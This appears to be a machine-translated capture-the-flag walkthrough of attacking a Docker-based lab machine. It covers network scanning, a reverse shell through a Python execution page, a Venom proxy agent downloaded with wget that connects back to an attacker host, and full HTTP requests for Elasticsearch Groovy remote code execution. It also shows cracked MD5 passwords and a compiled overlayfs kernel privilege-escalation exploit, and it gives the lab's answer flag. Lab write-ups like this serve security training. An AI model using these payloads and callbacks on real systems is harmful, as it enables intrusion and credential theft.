First, we can scan the current intranet through arp-scan.
But I don’t know why it can’t be scanned out. Then we can use fscan to get the survival
The scan here generally only opens port 22.
So we use nmap for information collection scanning
nmap -sS -sV -A -p- 172.25.0.13 Perform version service scanning through tcp and detect system version full port
Here we can find that it is written through python
Or if we just want to test the port, use PortScan to scan
Then let’s access port 5000 and see
Here we are prompted to enter the code to execute the python code, so let’s see if we can directly rebound the shell
getshell slightly
See the title here
This is a medium-difficulty target machine. There are several docker virtual machines inside it, so that it can have preliminary involvement in the intranet part, such as intranet information collection, intranet penetration, simple lateral movement, etc. . Connect to the network, independently detect and discover the simulated virtual target machine, and exploit its vulnerabilities to obtain its root privileges. Submit the password of user john as the answer.
It is conceivable that it may be a docker virtual machine
Quickly determine whether it is a docker environment_How to determine whether a website is docker-CSDN Blog
Check whether it is docker
ps -ef
Very few indeed
ls /.dockerenv
indeed
/proc/1/cgroup
It’s all docker, so the docker environment is gone.
Let’s learn about agents here
Intranet proxy
I used Neo-reGeorg-5.1.0 before, but this site needs to be opened for common codes. If it cannot be parsed in the site, it will not work.
Learn here
venom
Release Venom v1.1.0 · Dliv3/Venom · GitHub
First we start the service. Here I am windows.
.\admin.exe -lport 9999
Then start the service and download it to the target machine through wget.
chmod 777 agent_linux_x64 ./agent_linux_x64 -rhost 10.8.0.6 -rport 9999
Then return to the host
show goto 1 socks 1080
In this way we enable the socks5 proxy at 1080
Then we go to the link
Here we first need to know what is the intranet IP corresponding to this docker
ifconfig
172.17.0.3
Let’s visit 172.17.0.3:5000
Found to be the same
So here is our corresponding intranet IP
How do we implement docker escape?
First we need to explore
Intranet shell script exploration
for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done
Here we cannot send out ping through socks proxy because it is on a different layer, so we can either get ping through rebound shell.
Either proxy out nmap, but my nmap cleared out a lot of incorrect ones. It might be a problem with the shooting range, so I chose to execute the shell script in the rebound shell.
Get it here 172.17.0.1, 172.17.0.2, 172.17.0.3 these ip
Then we can scan the service through nmap
nmap -sV -sT 172.17.0.2 -Pn
Obtain a 9200 port and open the elasticsearch service
OK
Go search for exp
Then copy it into python
When wget uploads and executes, it is found that the error request is not installed.
pip install -t /usr/lib/python2.7/dist-packages/ requests
Shooting range problem cannot be installed online
So we use local installation
https://www.cnblogs.com/Javi/p/9151629.html
https://www.cnblogs.com/rainbow-tan/p/14794387.html
These two articles can be downloaded
and then execute
python 36337.py 172.17.0.2
getshell
I can’t achieve it here, so I choose to reproduce it manually
Create a data first to ensure that the data exists
POST /website/blog/ HTTP/1.1
Host: 172.17.0.2:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
The second is to execute the command
POST /_search?pretty HTTP/1.1
Host: 172.17.0.2:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class .forName("java.lang.Runtime").getRuntime().exec("ls").getText()"}}}
I found that passwords exist. Let’s see what they are.
sort it out
john:3f8184a7343664553fcb5337a3138814 ---->1337hack test:861f194e9d6118f3d942a72be3e51749 ---->1234test admin:670c3bbc209a18dde5446e5e6c1f1d5b---->1111pass root:b3d34352fc26117979deabdf1b9b6354 ---->1234pass jane:5c158b60ed97c723b673529b8a3cf72b ---->1234jane
Check out the md5 blasting website
Take a look through the ssh link in turn
Finally, I successfully logged in through john’s account and password 
Elevation of privilege
Now we need to escalate privileges
First look at the kernel
uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Find it
searchsploit 3.13.0 linux
extract it
There is a problem here because the machines are different, so the so files will not be the same.
Therefore, we cannot guarantee that the same os file exists on the target machine, and gcc does not exist on the target machine.
So we need to pass exp and so together
Modify the source code first
Delete here (comment here)
Then gcc packages
gcc -o exp 37292.c
Then we go to locate the so file
find / -name ofs-lib.so 2>/dev/null or locate ofs-lib.so cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so /mnt/c/Users/Administrator/Desktop/
Then we upload it directly to tmp
Empowering execution
An error is reported here. This means that the dynamic link library in my kali is too high. Here we can use
ldd –version
Determine the target machine ldd and then download, unzip and select it when compiling
gcc -o exp 37292.c -Ldir /mnt/c/Users/Administrator/Desktop/ldd-2.19/libc6_2.19-0ubuntu6_amd64/data/lib/x86_64-linux-gnu/libc.so.6</ pre> <p>Then just pass the authorization</p> <pre>chmod + x exp ./exp
Success
So the flag is 1337hack
I think the most important thing is to solve the problem of being unable to execute commands on the target machine to obtain exp.